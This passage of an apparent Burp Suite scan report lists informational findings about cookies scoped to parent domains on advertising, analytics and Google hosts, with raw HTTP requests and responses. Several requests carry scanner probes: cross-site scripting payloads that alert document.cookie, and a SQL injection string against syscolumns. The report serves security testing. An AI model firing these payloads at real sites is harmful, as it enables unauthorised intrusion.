Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/
Location: http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?AQB=1&pccr=true&vidn=269EF4F28501182F-60000108600B027D&&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 21:06:45 GMT
Last-Modified: Tue, 25 Jan 2011 21:06:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www67
Content-Length: 0
Content-Type: text/plain

13.121. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.traderonline.com
Path:	/b/ss/detraderonline/1/H.17/s93964351669419

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B; s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:58:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/
Location: http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&pccr=true&vidn=269ED0D58501209E-6000010F000341E3&&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 15:58:35 GMT
Last-Modified: Tue, 25 Jan 2011 15:58:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www120
Content-Length: 0
Content-Type: text/plain

13.122. http://mig.nexac.com/2/B3DM/DLX/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

13.123. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; RMFL=011PcqlQU10EfJ|U10Eo1; NXCLICK2=011PcqlaNX_TRACK_Nutrisystem/Retarget_Landingpage_Nonsecure!y!B3!EfJ!pUFr

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Set-Cookie: NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/USNetwork/BCN2010110276_000_RadioShack/1x1trans.gif
Content-Length: 380
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Tue, 25-Jan-2011 01:36:47 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

13.124. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=l1BiwdjcCTroTK-K11vpoJYXA2GR-MKqNnvn-usQ9nG-kEelHz0dvh9l2PAxuhYkYQR3A8EcDoxLFigNK6u0PyNFzCobPo82nFHUXfrDtZTwHPkXlQ3qqJ0QRzynQjQS;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=l1BiwdjcCTroTK-K11vpoJYXA2GR-MKqNnvn-usQ9nG-kEelHz0dvh9l2PAxuhYkYQR3A8EcDoxLFigNK6u0PyNFzCobPo82nFHUXfrDtZTwHPkXlQ3qqJ0QRzynQjQS;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly
Location: /news?pz=1&hl=en&ned=us
Date: Mon, 24 Jan 2011 22:43:05 GMT
Expires: Mon, 24 Jan 2011 22:43:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/news?pz=1&hl=en&ned=us">here</A>.
</B
...[SNIP]...

13.125. http://news.google.com/nwshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/nwshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=E781T2uXYKpJesTpQSj-QmWvpOJw0eAB35y5tD9Y9YMJOnjI_daOzuxSBWDXOMdoEL2Vftts46kKWniW_IBOj-_IL66C68vTFDtYjDMwKwZMxerdWsyuLeaEUJRnxDP1;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:04 GMT;HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=E781T2uXYKpJesTpQSj-QmWvpOJw0eAB35y5tD9Y9YMJOnjI_daOzuxSBWDXOMdoEL2Vftts46kKWniW_IBOj-_IL66C68vTFDtYjDMwKwZMxerdWsyuLeaEUJRnxDP1;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:04 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:04 GMT
Expires: Mon, 24 Jan 2011 22:43:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

13.126. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.webshots.com
Path:	/photo/1059414821042998563QWNlxQ/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photo/1059414821042998563QWNlxQ/x22 HTTP/1.1
Host: news.webshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 22:43:59 GMT
Server: Resin/3.0.23
Location: http://community.webshots.com/oldphoto.html
Set-Cookie: AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
Set-Cookie: session_source=webs; domain=.webshots.com; path=/
Content-Length: 0
Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
Vary: Accept-Encoding
Content-Type: text/plain

13.127. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:24:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4570
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/
...[SNIP]...

13.128. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: oasc05139.247realmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW800+NmAABp5o; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1806063784/Middle
...[SNIP]...

13.129. http://pc3.yumenetworks.com/dynamic_btx/118_12345 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pc3.yumenetworks.com
Path:	/dynamic_btx/118_12345

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynamic_btx/118_12345 HTTP/1.1
Host: pc3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
YmBtHdr: @BT118_1_0
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAHYAAARgAAAAAA**; Domain=.yumenetworks.com; Expires=Sat, 26-Mar-2011 02:19:11 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

GIF89a.............!...
...,...........L..;

13.130. http://picasaweb.google.com/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=EEexv5AfGzAjkzXsNwMmwQ; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Mon, 24 Jan 2011 16:02:04 GMT
Date: Mon, 24 Jan 2011 16:02:04 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=ffbRQhyMGl9D; Path=/; HttpOnly
Set-Cookie: S=photos_html=EEexv5AfGzAjkzXsNwMmwQ; Domain=.google.com; Path=/; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=http%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttp%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

13.131. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=glkstgCRHSUXAYU8LXZieg; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Mon, 24 Jan 2011 16:02:05 GMT
Date: Mon, 24 Jan 2011 16:02:05 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=MJQEmi1qTlzO; Path=/; HttpOnly
Set-Cookie: S=photos_html=glkstgCRHSUXAYU8LXZieg; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

13.132. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Ftweetmeme.com%2F&id=5c5c650d27&u=mozilla%2F5.0%20(windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us)%20applewebkit%2F534.10%20(khtml%2C%20like%20gecko)%20chrome%2F8.0.552.237%20safari%2F534.10&x=1295907703307&c=0&t=0&v=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=286f8b371579253c; Domain=.crowdscience.com; expires=Sun, 24 Apr 2011 22:21:01; Path=/
Content-Length: 867
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c361a3372a99df5c;path=/';
document.cookie = '__csv=286f8b371579253c;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('2d2e35941c7237e0'!='1')
...[SNIP]...

13.133. http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix01.revsci.net
Path:	/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/
NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Tue, 22-Feb-2011 02:19:11 GMT; Path=/
rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 02:19:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

